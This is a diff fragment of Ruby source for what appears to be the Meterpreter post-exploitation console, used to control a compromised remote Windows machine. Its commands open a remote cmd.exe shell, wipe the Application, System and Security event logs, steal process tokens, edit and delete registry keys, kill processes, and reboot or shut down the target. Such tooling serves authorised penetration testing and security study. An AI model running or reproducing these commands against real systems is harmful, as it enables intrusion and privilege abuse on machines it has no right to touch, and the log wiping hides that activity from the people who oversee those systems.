+			'InMemory'    => (from_mem) ? dummy_exec : nil,
+			'UseThreadToken' => use_thread_token)
+		print_line("Process #{p.pid} created.")
+		print_line("Channel #{p.channel.cid} created.") if (p.channel)
+		if (interact and p.channel)
+			shell.interact_with_channel(p.channel)
+		end
+	end
+	#
+	# Drop into a system shell as specified by %COMSPEC%
+	#
+	def cmd_shell(*args)
+		path = client.fs.file.expand_path("%COMSPEC%")
+		path = (path and not path.empty?) ? path : "cmd.exe"
+		cmd_execute("-f", path, "-c", "-H", "-i", "-t")
+	end
+	#
+	# Gets the process identifier that meterpreter is running in on the remote
+	# machine.
+	#
+	def cmd_getpid(*args)
+		print_line("Current pid: #{client.sys.process.getpid}")
+		return true
+	end
+	#
+	# Displays the user that the server is running as.
+	#
+	def cmd_getuid(*args)
+		print_line("Server username: #{client.sys.config.getuid}")
+	end
+	#
+	# Clears the event log
+	#
+	def cmd_clearev(*args)
+		logs = ['Application', 'System', 'Security']
+		logs << args
+		logs.flatten!
+		logs.each do |name|
+			log = client.sys.eventlog.open(name)
+			print_status("Wiping #{log.length} records from #{name}...")
+			log.clear
+		end
+	end
+	#
+	# Kills one or more processes.
+	#
+	def cmd_kill(*args)
+		if (args.length == 0)
+			print_line(
+				"Usage: kill pid1 pid2 pid3 ...\n\n" +
+				"Terminate one or more processes.")
+			return true
+		end
+		print_line("Killing: #{args.join(", ")}")
+		client.sys.process.kill(*(args.map { |x| x.to_i }))
+		return true
+	end
+	#
+	# Lists running processes.
+	#
+	def cmd_ps(*args)
+		processes = client.sys.process.get_processes
+		tbl = Rex::Ui::Text::Table.new(
+			'Header'  => "Process list",
+			'Indent'  => 1,
+			'Columns' =>
+				[
+					"PID",
+					"Name",
+					"Arch",
+					"Session",
+					"User",
+					"Path"
+				])
+		processes.each { |ent|
+			session = ent['session'] == 0xFFFFFFFF ? '' : ent['session'].to_s
+			arch    = ent['arch']
+			# for display and consistency with payload naming we switch the internal 'x86_64' value to display 'x64'
+			if( arch == ARCH_X86_64 )
+				arch = "x64"
+			end
+			tbl << [ ent['pid'].to_s, ent['name'], arch, session, ent['user'], ent['path'] ]
+		}
+		if (processes.length == 0)
+			print_line("No running processes were found.")
+		else
+			print("\n" + tbl.to_s + "\n")
+		end
+		return true
+	end
+	#
+	# Reboots the remote computer.
+	#
+	def cmd_reboot(*args)
+		print_line("Rebooting...")
+		client.sys.power.reboot
+	end
+	#
+	# Modifies and otherwise interacts with the registry on the remote computer
+	# by allowing the client to enumerate, open, modify, and delete registry
+	# keys and values.
+	#
+	def cmd_reg(*args)
+		# Extract the command, if any
+		cmd = args.shift
+		if (args.length == 0)
+			args.unshift("-h")
+		end
+		# Initiailze vars
+		key   = nil
+		value = nil
+		data  = nil
+		type  = nil
+		@@reg_opts.parse(args) { |opt, idx, val|
+			case opt
+				when "-h"
+					print_line(
+						"Usage: reg [command] [options]\n\n" +
+						"Interact with the target machine's registry.\n" +
+						@@reg_opts.usage +
+						"COMMANDS:\n\n" +
+						"    enumkey    Enumerate the supplied registry key [-k <key>]\n" +
+						"    createkey  Create the supplied registry key  [-k <key>]\n" +
+						"    deletekey  Delete the supplied registry key  [-k <key>]\n" +
+						"    queryclass Queries the class of the supplied key [-k <key>]\n" +
+						"    setval     Set a registry value [-k <key> -v <val> -d <data>]\n" +
+						"    deleteval  Delete the supplied registry value [-k <key> -v <val>]\n" +
+						"    queryval   Queries the data contents of a value [-k <key> -v <val>]\n\n")
+					return false
+				when "-k"
+					key   = val
+				when "-v"
+					value = val
+				when "-t"
+					type  = val
+				when "-d"
+					data  = val
+			end
+		}
+		# All commands require a key.
+		if (key == nil)
+			print_error("You must specify a key path (-k)")
+			return false
+		end
+		# Split the key into its parts
+		root_key, base_key = client.sys.registry.splitkey(key)
+		begin
+			# Rock it
+			case cmd
+				when "enumkey"
+					open_key = client.sys.registry.open_key(root_key, base_key)
+					print_line(
+						"Enumerating: #{key}\n")
+					keys = open_key.enum_key
+					vals = open_key.enum_value
+					if (keys.length > 0)
+						print_line("  Keys (#{keys.length}):\n")
+						keys.each { |subkey|
+							print_line("\t#{subkey}")
+						}
+						print_line
+					end
+					if (vals.length > 0)
+						print_line("  Values (#{vals.length}):\n")
+						vals.each { |val|
+							print_line("\t#{val.name}")
+						}
+						print_line
+					end
+					if (vals.length == 0 and keys.length == 0)
+						print_line("No children.")
+					end
+				when "createkey"
+					open_key = client.sys.registry.create_key(root_key, base_key)
+					print_line("Successfully created key: #{key}")
+				when "deletekey"
+					client.sys.registry.delete_key(root_key, base_key)
+					print_line("Successfully deleted key: #{key}")
+				when "setval"
+					if (value == nil or data == nil)
+						print_error("You must specify both a value name and data (-v, -d).")
+						return false
+					end
+					type = "REG_SZ" if (type == nil)
+					open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
+					open_key.set_value(value, client.sys.registry.type2str(type), data)
+					print_line("Successful set #{value}.")
+				when "deleteval"
+					if (value == nil)
+						print_error("You must specify a value name (-v).")
+						return false
+					end
+					open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
+					open_key.delete_value(value)
+					print_line("Successfully deleted #{value}.")
+				when "queryval"
+					if (value == nil)
+						print_error("You must specify a value name (-v).")
+						return false
+					end
+					open_key = client.sys.registry.open_key(root_key, base_key, KEY_READ)
+					v = open_key.query_value(value)
+					print(
+						"Key: #{key}\n" +
+						"Name: #{v.name}\n" +
+						"Type: #{v.type_to_s}\n" +
+						"Data: #{v.data}\n")
+				when "queryclass"
+					open_key = client.sys.registry.open_key(root_key, base_key, KEY_READ)
+					data = open_key.query_class
+					print("Data: #{data}\n")
+				else
+					print_error("Invalid command supplied: #{cmd}")
+			end
+		ensure
+			open_key.close if (open_key)
+		end
+	end
+	#
+	# Calls RevertToSelf() on the remote machine.
+	#
+	def cmd_rev2self(*args)
+		client.sys.config.revert_to_self
+	end
+	#
+	# Obtains as many privileges as possible on the target machine.
+	#
+	def cmd_getprivs(*args)
+		print_line("=" * 60)
+		print_line("Enabled Process Privileges")
+		print_line("=" * 60)
+		client.sys.config.getprivs.each do |priv|
+			print_line("  #{priv}")
+		end
+		print_line("")
+	end
+	#
+	# Tries to steal the primary token from the target process.
+	#
+	def cmd_steal_token(*args)
+		if(args.length != 1 or args[0] == "-h")
+			print_error("Usage: steal_token [pid]")
+			return
+		end
+		print_line("Stolen token with username: " + client.sys.config.steal_token(args[0]))
+	end
+	#
+	# Drops any assumed token.
+	#
+	def cmd_drop_token(*args)
+		print_line("Relinquished token, now running as: " + client.sys.config.drop_token())
+	end
+	#
+	# Displays information about the remote system.
+	#
+	def cmd_sysinfo(*args)
+		info = client.sys.config.sysinfo
+		print_line("Computer: " + info['Computer'])
+		print_line("OS      : " + info['OS'])
+		print_line("Arch    : " + info['Architecture'])
+		print_line("Language: " + info['System Language'])
+		return true
+	end
+	#
+	# Shuts down the remote computer.
+	#
+	def cmd_shutdown(*args)
+		print_line("Shutting down...")
+		client.sys.power.shutdown
+	end
+end
+end
+end
+end
+end